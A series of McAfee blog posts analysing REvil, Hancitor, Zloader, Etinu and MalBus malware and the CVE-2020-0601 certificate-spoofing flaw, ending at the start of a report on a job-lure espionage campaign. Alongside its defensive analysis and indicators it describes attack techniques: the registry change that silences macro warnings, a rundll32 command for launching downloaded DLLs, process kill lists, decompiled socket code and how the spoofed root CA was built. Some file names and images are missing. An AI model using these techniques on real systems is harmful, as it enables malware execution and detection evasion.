REvil is one of the most famous ransomware-as-a-service (RaaS) providers. The group released the Sodinokibi ransomware in 2019, and McAfee has since observed REvil using a DLL side loading technique to execute ransomware code. The actual ransomware is a dropper that contains two embedded PE files in the resource section.  After successful execution, it drops two additional files named MsMpEng.exe and MpSvc.dll in the temp folder. The file MsMpEng.exe is a Microsoft digitally signed file having a timestamp of March 2014 (Figure 1).


The malware uses DLL side loading to execute the ransomware code. This technique allows the attacker to execute malicious DLLs that spoof legitimate ones. This technique has been used in many APTs to avoid detection. In this attack, MsMpEng.exe loads the functions of MpSvc.dll during the time of execution. However, the attacker has replaced the clean MpSvc.dll with the ransomware binary of the same name. The malicious DLL file has an export function named ServiceCrtMain, which is further called and executed by the Microsoft Defender file. This is a clever technique used by the attacker to execute malicious file using the Microsoft digitally signed binary.


The ransomware uses the RC4 algorithm to decrypt the config file which has all the information that supports the encryption process.

Then it performs a UI language check using GetSystemDefaultUILanguage/GetUserDefaultUILanguage functions and compares it with a hardcoded list which contains the language ID of several countries as shown in below image.

Countries excluded from this ransomware attack are mentioned below:

GetUserDefaultUILanguage Country name
0x419 Russian
0x422 Ukranian
0x423 Belarusian
0x428 Tajik (Cyrilic from Tajikistan)
0x42B Armenian
0x42C Azerbaijani (Latin from Azerbaijan)
0x437 Georgian
0x43F Kazakh from Kazakhastan
0x440 Kyrgyzstan
0x442 Turkmenistan
0x443 Latin from Uzbekistan
0x444 Tatar from Russia Federation
0x818 Romanian from Moldova
0x819 Russian from Moldova
0x82C Cyrilic from Azerbaijan
0x843 Cyrilic from Uzbekistan
0x45A Syriac
0x281A Cyrilic from Serbia


Additionally, the ransomware checks the users keyboardlayout and it skips the ransomware infection in the machine’s which are present in the country list above.

Ransomware creates a Global mutex in the infected machine to mark its presence.

After creating the mutex, the ransomware deletes the files in the recycle bin using the SHEmptyRecycleBinW function to make sure that no files are restored post encryption.

Then it enumerates all the active services with the help of the EnumServicesStatusExW function and deletes services if the service name matches the list present in the config file. The image below shows the list of services checked by the ransomware.

It calls the CreateToolhelp32Snapshot, Process32FirstW and Process32NextW functions to enumerate running processes and terminates those matching the list present in the config file.  The following processes will be terminated.

  • allegro
  • steam
  • xtop
  • ocssd
  • xfssvccon
  • onenote
  • isqlplussvc
  • msaccess
  • powerpnt
  • cad
  • sqbcoreservic
  • thunderbird
  • oracle
  • infopath
  • dbeng50
  • pro_comm_msg
  • agntsvc
  • thebat
  • firefox
  • ocautoupds
  • winword
  • synctime
  • tbirdconfig
  • mspub
  • visio
  • sql
  • ocomm
  • orcad
  • mydesktopserv
  • dbsnmp
  • outlook
  • cadence
  • excel
  • wordpad
  • creoagent
  • encsvc
  • mydesktopqos


Then, it encrypts files using the Salsa20 algorithm and uses multithreading for fast encryption of the files. Later, background wallpaper will be set with a ransom message.

Finally, the ransomware displays ransom notes in the victim’s machine. Below is an image of readme.txt which is dropped in the infected machine.

IOCs and Coverage

Type Value Detection Name Detection Package Version (V3)
Loader 5a97a50e45e64db41049fd88a75f2dd2 REvil.f 4493
Dropped DLL 78066a1c4e075941272a86d4a8e49471 REvil.e 4493


Expert rules allow McAfee customers to extend their coverage. This rule covers this REvil ransomware behaviour.


Technique ID Tactic Technique Details
T1059.003 Execution Command and Scripting Interpreter
T1574.002 DLL Side-Loading Hijack Execution Flow
T1486 Impact Data Encrypted for Impact
T1036.005 Defense Evasion Masquerading
T1057 Discovery Process Discovery
T1082 Discovery System Information Discovery


McAfee observed that the REvil group has utilized oracle web logic vulnerability (CVE-2019-2725) to spread the ransomware last year and used kaseya’s VSA application recently for their ransomware execution, with the help of DLL sideloading. REvil uses many vulnerability applications for ransomware infections, however the encryption technique remains the same. McAfee recommends making periodic backups of files and keeping them isolated off the network and having an always updated antivirus in place.

The post REvil Ransomware Uses DLL Sideloading appeared first on McAfee Blog.

Hancitor Making Use of Cookies to Prevent URL Scraping

8 July 2021 at 22:15
Consejos para protegerte de quienes intentan hackear tus correos electrónicos

This blog was written by Vallabh Chole & Oliver Devane

Over the years, the cybersecurity industry has seen many threats get taken down, such as the Emotet takedown in January 2021. It doesn’t usually take long for another threat to attempt to fill the gap left by the takedown. Hancitor is one such threat.

Like Emotet, Hancitor can send Malspams to spread itself and infect as many users as possible. Hancitor’s main purpose is to distribute other malware such as FickerStealer, Pony, CobaltStrike, Cuba Ransomware and Zeppelin Ransomware. The dropped Cobalt Strike beacons can then be used to move laterally around the infected environment and also execute other malware such as ransomware.

This blog will focus on a new technique used by Hancitor created to prevent crawlers from accessing malicious documents used to download and execute the Hancitor payload.

The infection flow of Hancitor is shown below:

A victim will receive an email with a fake DocuSign template to entice them to click a link. This link leads him to, a service that works similar to an RSS Feed and enables site owners to publish site updates to its users.

When accessing the link, the victim is redirected to the malicious site. The site will check the User-Agent of the browser and if it is a non-Windows User-Agent the victim will be redirected to

If the victim is on a windows machine, the malicious site will create a cookie using JavaScript and then reload the site.

The code to create the cookie is shown below:

The above code will write the Timezone to value ‘n’ and the time offset to UTC in value ‘d’ and set it into cookie header for an HTTP GET Request.

For example, if this code is executed on a machine with timezone set as BST the values would be:

d = 60

n = “Europe/London”

These values may be used to prevent further malicious activity or deploy a different payload depending on geo location.

Upon reloading, the site will check if the cookie is present and if it is, it will present them with the malicious document.

A WireShark capture of the malicious document which includes the cookie values is shown below:

The document will prompt them to enable macros and, when enabled, it will download the Hancitor DLL and then load it with Rundll32.

Hancitor will then communicate with its C&C and deploy further payloads. If running on a Windows domain, it will download and deploy a Cobalt Strike beacon.

Hancitor will also deploy SendSafe which is a spam module, and this will be used to send out malicious spam emails to infect more victims.


With its ability to send malicious spam emails and deploy Cobalt Strike beacons, we believe that Hancitor will be a threat closely linked to future ransomware attacks much like Emotet was. This threat also highlights the importance of constantly monitoring the threat landscape so that we can react quickly to evolving threats and protect our customers from them.

IOCs, Coverage, and MITRE


IOC Type IOC Coverage Content Version
Malicious Document SHA256 e389a71dc450ab4077f5a23a8f798b89e4be65373d2958b0b0b517de43d06e3b W97M/Dropper.hx


Hancitor DLL SHA256 c703924acdb199914cb585f5ecc6b18426b1a730f67d0f2606afbd38f8132ad6


Trojan-Hancitor.a 4644
Domain hosting Malicious Document URL http[:]//onyx-food[.]com/coccus.php RED N/A
Domain hosting Malicious Document


URL http[:]//feedproxy[.]google[.]com/~r/ugyxcjt/~3/4gu1Lcmj09U/coccus.php RED N/A


Technique ID Tactic Technique details
T1566.002 Initial Access Spam mail with links
T1204.001 Execution User Execution by opening link.
T1204.002 Execution Executing downloaded doc
T1218 Defence Evasion Signed Binary Execution Rundll32
T1055 Defence Evasion Downloaded binaries are injected into svchost for execution
T1482 Discovery Domain Trust Discovery
T1071 C&C HTTP protocol for communication
T1132 C&C Data is base64 encoded and xored



The post Hancitor Making Use of Cookies to Prevent URL Scraping appeared first on McAfee Blog.

Zloader With a New Infection Technique

8 July 2021 at 21:44

This blog was written by Kiran Raj & Kishan N.


In the last few years, Microsoft Office macro malware using social engineering as a means for malware infection has been a dominant part of the threat landscape. Malware authors continue to evolve their techniques to evade detection. These techniques involve utilizing macro obfuscation, DDE, living off the land tools (LOLBAS), and even utilizing legacy supported XLS formats.

McAfee Labs has discovered a new technique that downloads and executes malicious DLLs (Zloader) without any malicious code present in the initial spammed attachment macro. The objective of this blog is to cover the technical aspect of the newly observed technique.

Infection map

Threat Summary

  • The initial attack vector is a phishing email with a Microsoft Word document attachment.
  • Upon opening the document, a password-protected Microsoft Excel file is downloaded from a remote server.
  • The Word document Visual Basic for Applications (VBA) reads the cell contents of the downloaded XLS file and writes into the XLS VBA as macros.
  • Once the macros are written to the downloaded XLS file, the Word document sets the policy in the registry to Disable Excel Macro Warning and calls the malicious macro function dynamically from the Excel file,
  • This results in the downloading of the Zloader payload. The Zloader payload is then executed by rundll32.exe.

The section below contains the detailed technical analysis of this technique.

Detailed Technical Analysis

Infection Chain

The malware arrives through a phishing email containing a Microsoft Word document as an attachment. When the document is opened and macros are enabled, the Word document, in turn, downloads and opens another password-protected Microsoft Excel document.

After downloading the XLS file, the Word VBA reads the cell contents from XLS and creates a new macro for the same XLS file and writes the cell contents to XLS VBA macros as functions.

Once the macros are written and ready, the Word document sets the policy in the registry to Disable Excel Macro Warning and invokes the malicious macro function from the Excel file. The Excel file now downloads the Zloader payload. The Zloader payload is then executed using rundll32.exe.

Figure-1: flowchart of the Infection chain

Word Analysis

Here is how the face of the document looks when we open the document (figure 2). Normally, the macros are disabled to run by default by Microsoft Office. The malware authors are aware of this and hence present a lure image to trick the victims guiding them into enabling the macros.

Figure-2: Image of Word Document Face

The userform combo-box components present in the Word document stores all the content required to connect to the remote Excel document including the Excel object, URL, and the password required to open the Excel document. The URL is stored in the Combobox in the form of broken strings which will be later concatenated to form a complete clear string.

Figure-3: URL components (right side) and the password to open downloaded Excel document (“i5x0wbqe81s”) present in user-form components.

VBA Macro Analysis of Word Document

Figure-4: Image of the VBA editor

In the above image of macros (figure 4), the code is attempting to download and open the Excel file stored in the malicious domain. Firstly, it creates an Excel application object by using CreateObject() function and reading the string from Combobox-1 (ref figure-2) of Userform-1 which has the string “excel. Application” stored in it. After creating the object, it uses the same object to open the Excel file directly from the malicious URL along with the password without saving the file on the disk by using Workbooks.Open() function.

Figure-5: Word Macro code that reads strings present in random cells in Excel sheet.


The above snippet (figure 5) shows part of the macro code that is reading the strings from the Excel cells.

For Example:

Ixbq = ifk.sheets(3).Cells(44,42).Value

The code is storing the string present in sheet number 3 and the cell location (44,42) into the variable “ixbq”. The Excel.Application object that is assigned to variable “ifk” is used to access sheets and cells from the Excel file that is opened from the malicious domain.

In the below snippet (figure 6), we can observe the strings stored in the variables after being read from the cells. We can observe that it has string related to the registry entry “HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Excel\Security\AccessVBOM” that is used to disable trust access for VBA into Excel and the string “Auto_Open3” that is going to be the entry point of the Excel macro execution.

We can also see the strings “ThisWorkbook”, “REG_DWORD”, “Version”, “ActiveVBProject” and few random functions as well like “Function c4r40() c4r40=1 End Function”. These macro codes cannot be detected using static detection since the content is formed dynamically on run time.

Figure-6: Value of variables after reading Excel cells.

After extracting the contents from the Excel cells, the parent Word file creates a new VBA module in the downloaded Excel file by writing the retrieved contents. Basically, the parent Word document is retrieving the cell contents and writing them to XLS macros.

Once the macro is formed and ready, it modifies the below RegKey to disable trust access for VBA on the victim machine to execute the function seamlessly without any Microsoft Office Warnings.


After writing macro contents to Excel file and disabling the trust access, function ’Auto_Open3()’ from newly written excel VBA will be called which downloads zloader dll from the ‘hxxp://’ with extension .cpl

Figure-7: Image of ’Auto_Open3()’ function

The downloaded dll is saved in %temp% folder and executed by invoking rundll32.exe.

Figure-8: Image of zloader dll invoked by rundll32.exe

Command-line parameter:

Rundll32.exe shell32.dll,Control_RunDLL “<path downloaded dll>”

Windows Rundll32 commands loads and runs 32-bit DLLs that can be used for directly invoking specified functions or used to create shortcuts. In the above command line, the malware uses “Rundll32.exe shell32.dll,Control_RunDLL” function to invoke control.exe (control panel) and passes the DLL path as a parameter, therefore the downloaded DLL is executed by control.exe.

Excel Document Analysis:

The below image (figure 9) is the face of the password-protected Excel file that is hosted on the server. We can observe random cells storing chunks of strings like “RegDelete”, “ThisWorkbook”, “DeleteLines”, etc.

These strings present in worksheet cells are formed as VBA macro in the later stage.

Figure-9: Image of Remote Excel file.

Coverage and prevention guidance:

McAfee’s Endpoint products detect this variant of malware and files dropped during the infection process.

The main malicious document with SHA256 (210f12d1282e90aadb532e7e891cbe4f089ef4f3ec0568dc459fb5d546c95eaf) is detected with V3 package version – 4328.0 as “W97M/Downloader.djx”.  The final Zloader payload with SHA-256 (c55a25514c0d860980e5f13b138ae846b36a783a0fdb52041e3a8c6a22c6f5e2)which is a DLL is detected by signature Zloader-FCVPwith V3 package version – 4327.0

Additionally, with the help of McAfee’s Expert rule feature, customers can strengthen the security by adding custom Expert rules based on the behavior patterns of the malware. The below EP rule is specific to this infection pattern.

McAfee advises all users to avoid opening any email attachments or clicking any links present in the mail without verifying the identity of the sender. Always disable the macro execution for Office files. We advise everyone to read our blog on this new variant of Zloader and its infection cycle to understand more about the threat.

Different techniques & tactics are used by the malware to propagate and we mapped these with the MITRE ATT&CK platform.

  • E-mail Spear Phishing (T1566.001): Phishing acts as the main entry point into the victim’s system where the document comes as an attachment and the user enables the document to execute the malicious macro and cause infection. This mechanism is seen in most of the malware like Emotet, Drixed, Trickbot, Agenttesla, etc.
  • Execution (T1059.005): This is a very common behavior observed when a malicious document is opened. The document contains embedded malicious VBA macros which execute code when the document is opened/closed.
  • Defense Evasion (T1218.011): Execution of signed binary to abuse Rundll32.exe and to proxy execute the malicious code is observed in this Zloader variant. This tactic is now also part of many others like Emotet, Hancitor, Icedid, etc.
  • Defense Evasion (T1562.001): In this tactic, it Disables or Modifies security features in Microsoft Office document by changing the registry keys.


Type Value Scanner Detection Name Detection Package Version (V3)
Main Word Document 210f12d1282e90aadb532e7e891cbe4f089ef4f3ec0568dc459fb5d546c95eaf ENS W97M/Downloader.djx 4328
Downloaded dll c55a25514c0d860980e5f13b138ae846b36a783a0fdb52041e3a8c6a22c6f5e2 ENS Zloader-FCVP 4327
URL to download XLS hxxp:// WebAdvisor


Blocked N/A
URL to download dll hxxp:// WebAdvisor


Blocked N/A


Malicious documents have been an entry point for most malware families and these attacks have been evolving their infection techniques and obfuscation, not just limiting to direct downloads of payload from VBA, but creating agents dynamically to download payload as we discussed in this blog. Usage of such agents in the infection chain is not only limited to Word or Excel, but further threats may use other living off the land tools to download its payloads.

Due to security concerns, macros are disabled by default in Microsoft Office applications. We suggest it is safe to enable them only when the document received is from a trusted source.

The post Zloader With a New Infection Technique appeared first on McAfee Blog.

Clever Billing Fraud Applications on Google Play: Etinu

19 April 2021 at 21:42

Authored by: Sang Ryol Ryu and Chanung Pak

A new wave of fraudulent apps has made its way to the Google Play store, targeting Android users in Southwest Asia and the Arabian Peninsula as well—to the tune of more than 700,000 downloads before detection by McAfee Mobile Research and co-operation with Google to remove the apps.

Figure 1. Infected Apps on Google Play

Posing as photo editors, wallpapers, puzzles, keyboard skins, and other camera-related apps, the malware embedded in these fraudulent apps hijack SMS message notifications and then make unauthorized purchases. While apps go through a review process to ensure that they are legitimate, these fraudulent apps made their way into the store by submitting a clean version of the app for review and then introducing the malicious code via updates to the app later.

Figure 2. Negative reviews on Google Play

McAfee Mobile Security detects this threat as Android/Etinu and alerts mobile users if they are present. The McAfee Mobile Research team continues to monitor this threat and is likewise continuing its co-operation with Google to remove these and other malicious applications on Google Play.

Technical analysis

In terms of details, the malware embedded in these apps takes advantage of dynamic code loading. Encrypted payloads of malware appear in the assets folder associated with the app, using names such as “cache.bin,” “settings.bin,” “data.droid,” or seemingly innocuous “.png” files, as illustrated below.

Figure 3. Encrypted resource sneaked into the assets folder

Figure 4. Decryption flow

The figure above shows the decryption flow. Firstly, the hidden malicious code in the main .apk opens “1.png” file in the assets folder, decrypts it to “loader.dex,” and then loads the dropped .dex. The “1.png” is encrypted using RC4 with the package name as the key. The first payload creates HTTP POST request to the C2 server.

Interestingly, this malware uses key management servers. It requests keys from the servers for the AES encrypted second payload, “2.png”. And the server returns the key as the “s” value of JSON. Also, this malware has self-update function. When the server responds “URL” value, the content in the URL is used instead of “2.png”. However, servers do not always respond to the request or return the secret key.

Figure 5. Updated payload response

As always, the most malicious functions reveal themselves in the final stage. The malware hijacks the Notification Listener to steal incoming SMS messages like Android Joker malware does, without the SMS read permission. Like a chain system, the malware then passes the notification object to the final stage. When the notification has arisen from the default SMS package, the message is finally sent out using WebView JavaScript Interface.

Figure 6. Notification delivery flow

As a result of our additional investigation on C2 servers, following information was found, including carrier, phone number, SMS message, IP address, country, network status, and so forth—along with auto-renewing subscriptions:

Figure 7. Leaked data

Further threats like these to come?

We expect that threats which take advantage of Notification Listener will continue to flourish. The McAfee Mobile Research team continues to monitor these threats and protect customers by analyzing potential malware and working with app stores to remove it. Further, using McAfee Mobile Security can detect such threats and protect you from them via its regular updates. However, it’s important to pay attention to apps that request SMS-related permissions and Notification Listener permissions. Simply put, legitimate photo and wallpaper apps simply won’t ask for those because they’re not necessary for such apps to run. If a request seems suspicious, don’t allow it.

Technical Data and IOCs



08FA33BC138FE4835C15E45D1C1D5A81094E156EEF28D02EA8910D5F8E44D4B8 com.super.color.hairdryer
0E2ACCFA47B782B062CC324704C1F999796F5045D9753423CF7238FE4CABBFA8 com.daynight.keyboard.wallpaper


The post Clever Billing Fraud Applications on Google Play: Etinu appeared first on McAfee Blog.

MalBus Actor Changed Market from Google Play to ONE Store

9 April 2020 at 17:38

Authored by: Sang Ryol Ryu and Chanung Pak

McAfee Mobile Research team has found another variant of MalBus on an education application, developed by a South Korean developer. In the previous Malbus case, the author distributed the malware through Google Play, but new variants are distributed via the ONE Store in much the same way. ONE Store is a joint venture by the country’s three major telecom companies and is a preinstalled app on most Android phones selling in South Korea. It has 35 million users (close to 70% of South Korea’s population) and has already surpassed Apple’s app store sales from the end of 2018.

The application in question is distributed via Google Play and the ONE Store at the same time. The malicious application downloads and runs an encrypted payload with malicious functions.

McAfee Mobile Security detects this threat as Android/Malbus and alerts mobile users if it is present, while protecting them from any data loss.

Figure 1. Screen capture from the application page on the ONE Store

The Campaign

We found malicious code injected by an attacker, via the developer’s account, into versions 27 and 28 of the application distributed through the ONE Store. The App Signature Certificate for versions 26 through 29 distributed from the One Store are the same. No other application developed by the same author was found on the ONE Store. The ONE Store is now servicing version 29 which does not contain malicious code. Google Play still offers version 26, though this is also clear of infection.

Figure 2. Infected version history of the application

The overall flow of this application, focusing on the malicious function, is explained below:

Figure 3. Overview of malicious behavior

After the malware is installed, the malicious code has a latent period of 10 hours to avoid being discovered by dynamic analysis.

Figure 4. Using LastUpdateTime to check latent period

After the latent period, it starts two threads. The first one loads native library “” and calls one of its exported functions, “playMovie”, with a phone number as an argument while the second one creates a Java server socket for communication with another native library.

Figure 5. The malicious native library embedded in the APK

The first loaded library,, contains a curl binary and URLs for secondary payloads in XOR encoded data which are decoded at runtime. The XOR value is 0x8E and it is globally used in this library. All decoded URLs appear to have been hacked and the decoded URLs drop RC4 encrypted ELF files.


Table 1. Contents in

Simply put, is a downloader and executer. It downloads the next payload from a hacked web server by using a dropped curl binary, decrypts it and loads the library. Once the library is loaded, the downloaded file is deleted to avoid detection. Lastly, the downloaded code starts from exported function name “Libfunc”.

Figure 6. The main flow of

As for the RC4 cryptographic library, encryption is the most common way to hide or protect important things. Accordingly, it is assumed that there is some important in this file.

Table 2. Additional information of downloaded file

The file sizes and data for szServer_XX_1 and szServer_XX_2 are the same as shown in Table 2. But szServer_XX_3 has several functions that are added, removed or modified a little bit. However, it does not affect the overall process.

“doMainProc” is the core function called by “Libfunc”. The first job of the “doMainProc” is selecting the C2 server randomly.

Table 3. C2 server list

After selecting the C2 server, a randomly created TUID is sent to the server. Guessing from its usage, the TUID might be a target device ID to manage contaminated targets. Now the application is working as a spy agent, waiting for actions from the selected server and ready to execute commands. We discovered the following available commands:


Table 4. Available command list

Among the malicious commands, an eye-catching feature is SMS and MMS capturing. SMS and MMS are saved in the “/data/data/<package name>/files/” directory as file name “sms.txt” and “mms.txt” respectively.

Figure 7. SMS and MMS are saved in txt files

This feature can be activated by registering the Android receiver.

Figure 8. RegisterReceiver

This malicious app opens TCP port 1111 locally to communicate with the loaded native library. Below is manually interpreted Java code:

public void run()


CommunicationThread commThread;

Socket socket = null;

serverSocket = new ServerSocket(sock_port); // sock_port = 1111

if (serverSocket) {

while ((!Thread.currentThread().isInterrupted())) {

commThread = new CommunicationThread(this, serverSocket.accept());

new Thread(commThread).start();




Figure 9. com.joojang.CharacterClassic.MainService

The SMS/MMS capture feature is enabled when receiving a “SET” string on local TCP 1111 port and disabled by receiving “FREE”.

Figure 10. SET or FREE

The loaded native library connects when the “SD_SetSMSCapture” command receives and sends “SET”

Figure 11. SD_SetSmsCapture

Below is interpreted as C language.

client = socket(AF_INET, SOCK_STREAM, 0);

addr.sin_family = AF_INET;

addr.sin_port = htons(1111);

addr.sin_addr.s_addr= inet_addr(“”);

One other function we have not seen before is “SD_LoadSoFile”. This loads a new native library and executes a specific function in it. This function seems to change the running native library to a newer one when the current binary has a problem, or to add new features.

Figure 12. SD_LoadSoFile

Compared to Malbus

This newly discovered malicious code has many similarities compared to Malbus, such as using the same malicious function name starting with “SD_”, file name, XOR’ed strings to hide original strings, embedded files in libraries, command ids, the same version of compiler and so on. It also has the differences mentioned above: downloading a malicious library directly instead of installing a plugin APK and no sensitive keyword list such as ‘North Korea’, ‘National Defense’ and so on.

Figure 13. The identical function names from the malicious library

Figure 14. The same version of compiler strings


Malware can be distributed through all manner of third-party app stores, not only official ones such as Google Play. This malware is carefully prepared – the final payload of the malware is the file that was hacked and uploaded to the vulnerable server before malware distribution. We believe the authors of this malware will continue to buy or hack trusted developer accounts to update malicious functionality, infiltrate and distribute through official app stores. As with previous cases, users should verify the applications they install, even if they download them from official stores. McAfee is working with Korean law enforcement agencies to help with the takedown of the attack campaign.


Hashes (SHA-256)

Initial Downloader (APKs)

  • 5e57bc8d83a372bf4d046c272cd43db9000036c9b32d8eecead1af75f4958c57
  • 1613b35c73c6497730490d7712ac015c2b42931446aed149e1292e2ba77d0ff4

Encrypted Trojan (additional payload)

  • d328373cd67c467485b9c96349a0ee08fc3b58fe2c11fb19f4dcb9ea6c7a0dae
  • c5bff68022ead6302f710f1ce1c3d5682a8cd3610b1f8ed2563098d7ac4e1909
  • c410cacbb0be8f649f082148c91f4cef27f101b8db3ce64a02882506c9b51a63
  • 178dddf38ec232d540bd88320521d8134644da1e7af19e7ae295b2d614e3ab56

Decrypted Trojan (additional payload)

  • 9fc914545fbb99b7e0d4a5207f5a2b32a8a127a36caa9159d4feeac445c509f7
  • df651ac1bfd60cd29cea85cc410002b933552260c2439fe86a4f32486abd0828
  • 63d10c9cd105c7b17effef18d31d571fe4c9c999966cc09bdb40df07c1b6baa8
  • f99212b70729942923fe26b996791cdd8eb561f8ae017e1d71202fbb97f7d245

The post MalBus Actor Changed Market from Google Play to ONE Store appeared first on McAfee Blog.

What CVE-2020-0601 Teaches Us About Microsoft’s TLS Certificate Verification Process

17 January 2020 at 21:25

By: Jan Schnellbächer and Martin Stecher, McAfee Germany GmbH

This week security researches around the world were very busy working on Microsoft’s major crypto-spoofing vulnerability (CVE-2020-0601) otherwise known as Curveball. The majority of research went into attacks with malicious binaries that are signed with a spoofed Certificate Authority (CA) which unpatched Win10 systems would in turn trust. The other attack vector —HTTPS-Server-Certificates— got less attention until Saleem Rashid posted a first working POC on Twitter, followed by Kudelski Security and “Ollypwn” who published more details  on how the Proof-Of-Concepts are created.

McAfee Security experts followed the same approach and were able to  reproduce the attack.  In addition, they confirmed that users  browsing via unpatched Windows-Systems were protected provided their clients were deployed behind McAfee’s Web Gateway or Web Gateway Cloud Service and running the certificate verification policy. This is typically part of the SSL Scanner but is also available as a separate policy even if no SSL inspection should be done (see KB92322 for details).

In our first attempt, we used the spoofed version of a CA from the Windows Root CA Trust store to sign a server certificate and then only provided the server certificate when the HTTPS connection wanted to be established. That attempt failed and we assumed that we did not get the spoofing right. Then we learned that the spoofed CA actually needs to be included together with the server certificate and that chain of certificates is then accepted by an unpatched Windows 10 system.

But why is that? By sending the spoofed version, it becomes obvious that this is not the same certificate that exists in the trust store and should be denied immediately. Also, in the beginning, we tried hard to make the spoofed CA as similar to the original CA as possible (same common name, same serial number, etc.). In fact, we found that none of that plays any role when Windows does the certificate verification.

A good indication of what’s happening behind the scenes, is already provided by Windows’ own certificate information dialogs. We started with the “UserTrust ECC Certificate” in the Windows Trusted Root CA catalog which carries the friendly name “Sectigo ECC”. Then we created a spoofed version of that CA and gave it a new common name “EVIL CA”. With that, it was easy to set up a new test HTTPS server in our test network and manipulate the routing of a test client so that it would reach our server when the user types into the browser. The test server  was presenting SSL session information for debugging purposes instead of any Google content.

When you click onto the lock symbol, the browser tells you that the connection has been accepted as valid and trusted and that the original “Sectigo ECC” root CA  had signed the server certificate.

But we know that this was not the case, and in contrast to our own original assumptions, Windows did not even verify the server certificate against the “Sectigo ECC. It compared it against the included spoofed CA. That can be seen, when you do another click to “View certificates”:

As the screenshot shows, we are still in the same SSL session (the master key is the same on both pictures), but now Windows is showing that the (correct) issuer of the server certificate is our spoofed “EVIL CA”.

Windows’ cryptographic signature verification works correctly

The good news is that Windows does not really have an issue with the cryptographic functions to validate the signature of an elliptic curve certificate! That verification works correctly. The problem is how the trust chain comparison is done to prove that the chain of signatures is correctly ending in the catalog of trusted root CAs.

We assumed that an attack would use a signing CA that points to an entry in the trusted Root CA store and verification of the signature would be limited so that the signature would be accepted although it was not signed with that original CA but a spoofed CA. But in fact, Windows is validating the embedded certificate chain — which is perfectly valid and cryptographically correct— and then matches the signing certificate with the entries in the trusted Root CA store. This last piece is what has not been done correctly (prior to the system patch).

Our tests revealed that Windows does not even try to match the certificates. It only matches the public key of the certificates (and a few more comparisons and checks) – making the comparison incomplete. That was the actual bug of this vulnerability (at least as web site certificates are concerned).

The Trusted Certificate Store is actually a Trusted Public Key Store

When we talk about the trust chain in SSL/TLS communication, we mean a chain of certificates that are signed by a CA until we reach a trusted Root CA. But Microsoft appears to ignore the certificates for the most part and manages a chain of the public keys of certificates. The comparison is also comparing the algorithm. At a time where only RSA certificates were used, that was sufficient. It was not possible for an attacker to create his own key pair with the same public key as the trusted certificate. With the introduction of Elliptic Curve Cryptography (ECC), Microsoft’s comparison of only the algorithm and the public key is failing. It is failing to also compare the characteristics of the elliptic curve itself. Without this additional parameter, it simply creates the same public key (curve point) again on a different curve. This is what was fixed on Patch-Tuesday — the comparison of the public key information now includes the curve characteristics.

This screenshot shows that the original certificate on the right side and the spoofed CA on the left are very different. Different common name, and a totally different elliptic curve (a standard curve for the original CA and a handcrafted for the spoofed version), but the signature seen under the “pub” entry is identical. That has been sufficient to make Windows believe that the embedded spoofed CA was the same as the trusted CA in the certificate store.

Why not comparing certificates by name or serial number?

A different (and maybe more natural) algorithm is to compare certificates by their common name and/or their serial number and whenever you have a match, continue the trust chain and verification with the certificate in the trust store. Why is Windows comparing public keys instead? We can only speculate but the advantage might be for Enterprises who want to swap their certificates without rolling out new root CAs to all client computers. Imagine an organization that maintains its own PKI and installs its own Root CA in the store of trusted certificates. When these companies go through mergers and acquisitions and the company name may change. This would be a good time to also change the common name of your signing certificate. However, if you do not have a good way to remote maintain all clients and update the certificate in the trusted store, it is easier to tell the Cooperation to use the original key pair of public and private keys and create a new certificate with that same key pair. The new cert will still match the old cert and no other client update is necessary. Convenient! But Is it secure? At this point it is not really a chain of trusted certificates but a chain of trusted public keys.

We tested whether this could also be mis-used to create a new cert when the old one has expired but that is not the case. After comparing the public keys, Windows is still using the expiration date of the certificate in the trusted store to determine whether the chain is still valid, which is good.

How to harden the process?

The root problem of this approach is that the complete cryptographic verification happens with the embedded certificates and only after verification the match against the entry in the trusted Root CAs store is done. That always has room for oversights and incomplete matching algorithms as we have seen with this vulnerability. A safe approach is to first match the certificates (or public keys), find the corresponding entry in the Trusted Root CA store and then use that trusted certificate to continue the signature verification. That way, the verification fails on the safe side and broken chains can be identified easily.

We do not know whether that has been changed with the patched Windows version or if only the matching algorithm has been improved. If not, we recommend reviewing this alternative approach and further hardening the implementation in the operating system and browser.

The post What CVE-2020-0601 Teaches Us About Microsoft’s TLS Certificate Verification Process appeared first on McAfee Blog.

Operation (노스 스타) North Star A Job Offer That’s Too Good to be True?

30 July 2020 at 04:14

Executive Summary

We are in the midst of an economic slump [1], with more candidates than there are jobs, something that has been leveraged by malicious actors to lure unwitting victims into opening documents laden with malware. While the prevalence of attacks during this unprecedented time has been largely carried out by low-level fraudsters, the more capable threat actors have also used this crisis as an opportunity to hide in plain sight.

One such example is a campaign that McAfee Advanced Threat Research (ATR) observed as an increase in malicious cyber activity targeting the Aerospace & Defense industry. In this 2020 campaign McAfee ATR discovered a series of malicious documents containing job postings taken from leading defense contractors to be used as lures, in a very targeted fashion. These malicious documents were intended to be sent to victims in order to install a data gathering implant. The victimology of these campaigns is not clear at this time, however based on the job descriptions, they appear to be targeting people with skills and experience relating to the content in the lure documents. The campaign appears to be similar to activity reported elsewhere by the industry, however upon further analysis the implants and lure documents in this campaign are distinctly different [2], thus we can conclude this research is part of a different activity set. This campaign is utilizing compromised infrastructure from multiple European countries to host its command and control infrastructure and distribute implants to the victims it targets.

This type of campaign has appeared before in 2017 and 2019 using similar methods with the goal of gathering intelligence surrounding key military and defense technologies [3]. The 2017 campaign also used lure documents with job postings from leading defense contractors; this operation was targeting individuals employed by defense contractors used in the lures. Based on some of the insight gained from spear phishing emails, the mission of that campaign was to gather data around certain projects being developed by their employers.

The Techniques, Tactics and Procedures (TTPs) of the 2020 activity are very similar to those previous campaigns operating under the same modus operandi that we observed in 2017 and 2019. From our analysis, this appears a continuation of the 2019 campaign, given numerous similarities observed. These similarities are present in both the Visual Basic code used to execute the implant and some of the core functionality that exists between the 2019 and 2020 implants.

Thus, the indicators from the 2020 campaign point to previous activity from 2017 and 2019 that was previously attributed to the threat actor group known as Hidden Cobra [4]. Hidden Cobra is an umbrella term used to refer to threat groups attributed to North Korea by the U.S Government [1]. Hidden Cobra consists of threat activity from groups the industry labels as Lazarus, Kimsuky, KONNI and APT37. The cyber offensive programs attributed to these groups, targeting organizations around the world, have been documented for years. Their goals have ranged from gathering data around military technologies to crypto currency theft from leading exchanges.

Our analysis indicates that one of the purposes of the activity in 2020 was to install data gathering implants on victims’ machines. These DLL implants were intended to gather basic information from the victims’ machines with the purpose of victim identification. The data collected from the target machine could be useful in classifying the value of the target. McAfee ATR noticed several different types of implants were used by the adversary in the 2020 campaigns.

